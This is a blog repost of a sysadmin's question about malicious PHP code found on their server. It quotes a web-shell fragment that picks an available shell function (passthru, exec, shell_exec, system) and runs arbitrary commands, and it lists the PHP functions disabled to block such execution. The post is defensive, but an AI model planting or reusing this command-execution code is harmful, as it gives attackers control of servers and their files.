Sunday, March 20, 2016

linux - Php functions are disabled, but somehow they can be executed

I had one problem on my server today and I discovered malicious code which is used to gain access to my system for attacker.
I have downloaded that php script, but what was weird is that I saw functions which are disabled in my php configuration.



Disabled are: passthru,exec,shell_exec,system.... among others



How is that possible?



This is part of code




function get_execution_method()
{
 if(function_exists('passthru')){ $m = "passthru"; }
 if(function_exists('exec')){ $m = "exec"; }
 if(function_exists('shell_exec')){ $m = "shell_ exec"; }
 if(function_exists('system')){ $m = "system"; }
 if(!isset($m)) //No method found :-|
 {
  $m = "Disabled";
 }

 return($m);
}
function execute_command($method,$command)
{
 if($method == "passthru")
 {
  passthru($command);
 }

 elseif($method == "exec")

 {
  exec($command,$result);
  foreach($result as $output)
  {
   print $output."
";
  }
 }

 elseif($method == "shell_exec")
 {

  print shell_exec($command);
 }

 elseif($method == "system")
 {
  system($command);
 }
}
function perm($file)
{

 if(file_exists($file))
 {
  return substr(sprintf('%o', fileperms($file)), -4);
 }
 else
 {
  return "????";
 }
}



Just to be sure that there are no left overs, I have copied that script to new account which no one has access to except me. There is no htaccess file or php.ini. Script still works on that account. I have created phpinfo file to see php configuration for that file and here are disabled functions.



pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,exec,system,passthru,shell_exec,proc_open,popen


As you can see, listed functions which are used in that script are inside disabled functions.



When I try to run some of disabled functions I get message




Warning: system() has been disabled for security reasons in /home/user....


Just to make sure, I have uploaded that script to different server and same was possible. That server also has same disabled functions.



How can I prevent this from allowing someone access to my files?

-

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

linux - How to SSH to ec2 instance in VPC private subnet via NAT server

I have created a VPC in aws with a public subnet and a private subnet. The private subnet does not have direct access to external network. S...